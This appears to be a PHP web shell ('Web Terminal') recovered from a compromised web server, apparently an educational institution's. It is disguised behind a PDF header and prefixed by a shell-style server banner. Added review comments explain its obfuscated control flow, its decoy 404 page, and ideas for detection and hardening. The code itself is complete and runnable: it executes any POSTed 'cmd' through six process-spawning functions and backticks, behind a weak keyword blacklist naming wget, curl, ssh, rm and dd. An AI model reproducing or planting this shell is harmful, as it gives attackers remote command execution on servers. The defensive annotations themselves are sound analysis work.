%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : kowitt.ac.th / Your IP : 216.73.216.11 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/activity/20190114-140747/test/ |
Upload File : |
<?php
/*
 * NOTE(review): this script is a PHP web shell ("Web Terminal"), not application code.
 * A copy found on a server is an indicator of compromise, not something to repair in place.
 *
 * What the visible code does:
 *  - Statements are shuffled behind goto labels and almost every PHP string literal is
 *    written in mixed octal/hex escapes. Runtime order is:
 *    rwfbp -> JXXX1 -> XFnaa -> uZxYj -> n6p2z -> myxXd -> DgXlh -> qysjA.
 *  - The POST field "cmd" is passed to executeCommand() (label myxXd) before the GET
 *    parameter "gocmd" is tested (label DgXlh). "gocmd" only selects which page is
 *    rendered; it does not gate execution.
 *  - Without "gocmd" the script prints an Apache-style "404 Not Found" body. No header()
 *    or http_response_code() call is visible, so the HTTP status presumably stays 200.
 *  - The listing shows a %PDF-1.5 header before the opening PHP tag; presumably this is
 *    meant to make magic-byte checks classify the upload as a PDF (verify against the
 *    file on disk).
 *
 * Detection ideas:
 *  - Uploaded files whose first bytes claim PDF but which contain a PHP open tag.
 *  - PHP source with dense goto labels and escape-only string literals.
 *  - Access logs: POST requests to a file under an upload directory, a "gocmd" query
 *    parameter, or a status-200 response whose body says "404 Not Found".
 *  - The web server / PHP worker process spawning a command interpreter.
 *
 * Hardening:
 *  - Deny script execution in upload directories and store uploads outside the web root.
 *  - Validate uploads by full content, not by leading magic bytes or extension.
 *  - executeCommand() walks six process-spawning functions plus the backtick operator,
 *    so disabling only one of them in disable_functions does not stop it.
 */
goto rwfbp;
/* n6p2z: initialise the output buffer that the HTML template later prints. */
n6p2z: $output = ''; goto myxXd;
/*
 * uZxYj: executeCommand($command)
 *  - Returns "Command blocked by security policy" when isSafeCommand() rejects the input.
 *  - Otherwise tries shell_exec, exec, system, passthru, proc_open and popen in that order,
 *    skipping any for which function_exists() is false, and returns the first result that
 *    is neither false nor null. All but proc_open append " 2>&1" to capture stderr.
 *  - If none returned, six exact command strings (ls, pwd, whoami, uname, "php -v", date)
 *    are answered with PHP built-ins (scandir, getcwd, get_current_user, php_uname,
 *    phpversion, date), and "free -m" is answered from /proc/meminfo when that file exists.
 *  - Last resort is the backtick operator, guarded by function_exists("shell_exec") and the
 *    safe_mode ini value.
 *  - Final fallback return value: "Command execution failed (all methods disabled)".
 */
uZxYj: function executeCommand($command) { if (!isSafeCommand($command)) { return "\103\x6f\155\x6d\x61\156\144\x20\142\x6c\x6f\x63\153\145\x64\40\x62\171\40\x73\x65\143\165\x72\x69\164\171\40\x70\x6f\x6c\151\x63\171"; } $methods = array("\163\150\x65\x6c\154\137\145\170\145\143" => function ($c) { return shell_exec($c . "\40\x32\76\x26\x31"); }, "\145\x78\x65\143" => function ($c) { exec($c . "\40\62\x3e\46\x31", $o); return implode("\xa", $o); }, "\x73\x79\x73\x74\x65\155" => function ($c) { ob_start(); system($c . "\40\62\76\x26\61"); return ob_get_clean(); }, "\x70\x61\163\x73\164\x68\x72\165" => function ($c) { ob_start(); passthru($c . "\x20\x32\x3e\x26\x31"); return ob_get_clean(); }, "\x70\x72\x6f\143\x5f\157\160\x65\x6e" => function ($c) { $descriptors = array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\151\160\x65", "\x77"), 2 => array("\160\x69\x70\x65", "\167")); $process = @proc_open($c, $descriptors, $pipes); if (!is_resource($process)) { return false; } $output = stream_get_contents($pipes[1]); $errors = stream_get_contents($pipes[2]); proc_close($process); return $output . $errors; }, "\x70\x6f\160\x65\x6e" => function ($c) { $handle = @popen($c . 
"\40\62\76\46\61", "\162"); if (!$handle) { return false; } $output = ''; while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); return $output; }); foreach ($methods as $method => $callback) { if (function_exists($method)) { $result = $callback($command); if ($result !== false && $result !== null) { return $result; } } } $fileBasedCommands = array("\x6c\163" => function () { return implode("\12", scandir("\56")); }, "\x70\167\144" => function () { return getcwd(); }, "\167\x68\157\141\155\x69" => function () { return get_current_user(); }, "\165\156\141\155\x65" => function () { return php_uname(); }, "\x70\x68\160\x20\55\x76" => function () { return phpversion(); }, "\144\141\x74\x65" => function () { return date("\131\55\x6d\x2d\x64\x20\110\x3a\x69\72\163"); }); if (isset($fileBasedCommands[$command])) { return $fileBasedCommands[$command](); } if ($command === "\x66\162\145\x65\x20\x2d\x6d" && file_exists("\57\160\x72\x6f\143\57\x6d\145\x6d\151\x6e\146\x6f")) { return file_get_contents("\x2f\160\162\x6f\x63\x2f\x6d\145\x6d\151\156\x66\x6f"); } if (function_exists("\163\x68\145\154\x6c\137\145\x78\145\x63") && !ini_get("\x73\141\146\145\x5f\x6d\x6f\144\145")) { $result = `{$command} 2>&1`; if (!empty($result)) { return $result; } } return "\103\157\x6d\x6d\141\x6e\x64\40\x65\x78\145\x63\165\164\x69\x6f\156\x20\x66\x61\151\154\x65\x64\x20\x28\141\x6c\x6c\x20\x6d\145\164\150\x6f\144\x73\x20\x64\151\x73\x61\142\154\x65\144\x29"; } goto n6p2z;
/* JXXX1: cap script run time at 30 seconds. */
JXXX1: set_time_limit(30); goto XFnaa;
/*
 * DgXlh: render step. With the GET parameter "gocmd" present, emit the "Web Terminal"
 * HTML form (stylesheet loaded from cdn.jsdelivr.net); otherwise emit the decoy 404 body.
 * $output was already passed through htmlspecialchars() at label myxXd, and the echoed
 * command is escaped here, so the page title and form markup are the stable content
 * signatures rather than any reflected input.
 */
DgXlh: if (isset($_GET["\147\x6f\143\x6d\144"])) { ?> <!doctypehtml> <html> <head> <meta charset="UTF-8"> <meta content="width=device-width,initial-scale=1" name="viewport"> <title>Web Terminal</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <style> body { background-color: #1e1e1e; color: #e0e0e0 } .terminal-container { background-color: #000; border-radius: 5px; padding: 15px; height: 70vh; overflow-y: 
auto; font-family: monospace } .prompt { color: #4caf50 } .command-input { border: none; color: #fff; width: 80%; outline: 0 } .output { white-space: pre-wrap; margin: 5px 0 } </style> </head> <body> <div class="container mt-3"> <div class="text-center"> <h3 class="text-center">Web Terminal</h3> <p>Programing by Alireza | @Special_One</p> </div> <div class="terminal-container" id="terminal"> <div class="output">Web Terminal - Enter commands below</div><?php if (!empty($output)) { ?> <div class="output"><span class="prompt">$</span><?php echo htmlspecialchars($_POST["\x63\x6d\x64"], ENT_QUOTES); ?> </div> <div class="output"><?php echo $output; ?> </div><?php } ?> </div> <form class="mt-2" method="post"> <div class="input-group"><span class="prompt input-group-text">$</span> <input autocomplete="off" autofocus class="command-input form-control" name="cmd" required> <button class="btn btn-success" type="submit">Run</button></div> </form> </div> <script> const terminal = document.getElementById('terminal'); if (terminal) terminal.scrollTop = terminal.scrollHeight; const cmdInput = document.querySelector('[name="cmd"]'); let history = []; let historyPos = 0; cmdInput.addEventListener('keydown', (e) => { if (e.key === 'ArrowUp') { if (historyPos < history.length) { e.preventDefault(); cmdInput.value = history[historyPos++]; } } else if (e.key === 'ArrowDown') { if (historyPos > 0) { e.preventDefault(); cmdInput.value = history[--historyPos]; } } else if (e.key === 'Enter') { history.unshift(cmdInput.value); historyPos = 0; } }); </script> </body> </html><?php } else { echo 
"\12\74\41\x44\117\x43\124\x59\x50\x45\40\x48\x54\x4d\x4c\40\120\125\102\114\111\x43\x20\x22\55\57\x2f\111\105\124\x46\57\x2f\104\x54\x44\40\x48\x54\x4d\114\40\x32\x2e\x30\57\x2f\x45\x4e\x22\x3e\xa\74\x68\x74\x6d\x6c\76\x3c\x68\145\x61\144\76\12\x3c\164\x69\164\154\145\76\x34\x30\x34\40\x4e\157\164\x20\106\157\x75\156\144\x3c\x2f\164\151\x74\154\x65\76\xa\x3c\57\150\145\141\144\76\x3c\142\157\144\x79\x3e\12\74\x68\x31\x3e\116\x6f\164\x20\x46\157\x75\x6e\x64\x3c\x2f\150\x31\76\12\74\x70\76\x54\x68\x65\x20\162\145\x71\165\145\163\164\x65\144\40\125\x52\114\40\x77\141\x73\40\x6e\157\x74\40\146\157\x75\x6e\144\x20\x6f\156\40\164\150\x69\163\40\163\x65\x72\x76\x65\162\x2e\x3c\x2f\x70\76\12\74\160\x3e\101\x64\x64\x69\164\x69\157\x6e\141\x6c\154\171\54\x20\141\40\x34\x30\x34\x20\x4e\157\164\x20\106\157\x75\x6e\144\12\145\x72\x72\157\162\40\x77\141\163\40\145\156\x63\x6f\165\156\164\x65\x72\145\x64\40\167\x68\151\x6c\145\x20\164\x72\x79\151\x6e\147\x20\164\x6f\40\x75\x73\145\x20\x61\x6e\x20\105\162\x72\x6f\162\104\x6f\143\x75\x6d\x65\x6e\164\x20\164\x6f\x20\150\x61\x6e\144\154\x65\x20\x74\150\x65\x20\162\145\161\x75\x65\163\164\56\x3c\x2f\x70\x3e"; } goto qysjA;
/*
 * myxXd: request handler. Any POST carrying "cmd" is executed and its output HTML-escaped.
 * This runs before the "gocmd" test at DgXlh, so during log review a decoy 404 body in the
 * response does not show that nothing was executed.
 */
myxXd: if (isset($_POST["\143\155\144"])) { $output = executeCommand($_POST["\143\x6d\144"]); $output = htmlspecialchars($output, ENT_QUOTES, "\125\124\x46\x2d\x38"); } goto DgXlh;
/* rwfbp: entry point. error_reporting(0) silences PHP errors and warnings, so failures of this script leave no PHP error output. */
rwfbp: error_reporting(0); goto JXXX1;
/*
 * XFnaa: isSafeCommand($cmd) is a substring blacklist, not a security control.
 * Decoded entries: "rm ", "mv ", "dd ", shutdown, reboot, halt, chmod, chown, wget, curl,
 * ftp, ssh and the characters > | & ; ` $ ( ) { }. It returns false if $cmd contains any
 * of them; every other input is passed on to the OS command functions unchanged.
 */
XFnaa: function isSafeCommand($cmd) { $blacklist = array("\162\x6d\40", "\x6d\166\x20", "\x64\x64\x20", "\x73\x68\x75\164\x64\157\x77\156", "\x72\145\142\157\157\x74", "\x68\141\x6c\164", "\x3e", "\x7c", "\46", "\73", "\140", "\x24", "\x28", "\x29", "\x7b", "\x7d", "\x63\x68\155\x6f\x64", "\x63\150\157\167\x6e", "\167\x67\145\164", "\143\165\x72\x6c", "\146\164\x70", "\163\163\150"); foreach ($blacklist as $forbidden) { if (strpos($cmd, $forbidden) !== false) { return false; } } return true; } goto uZxYj;
qysjA: ?>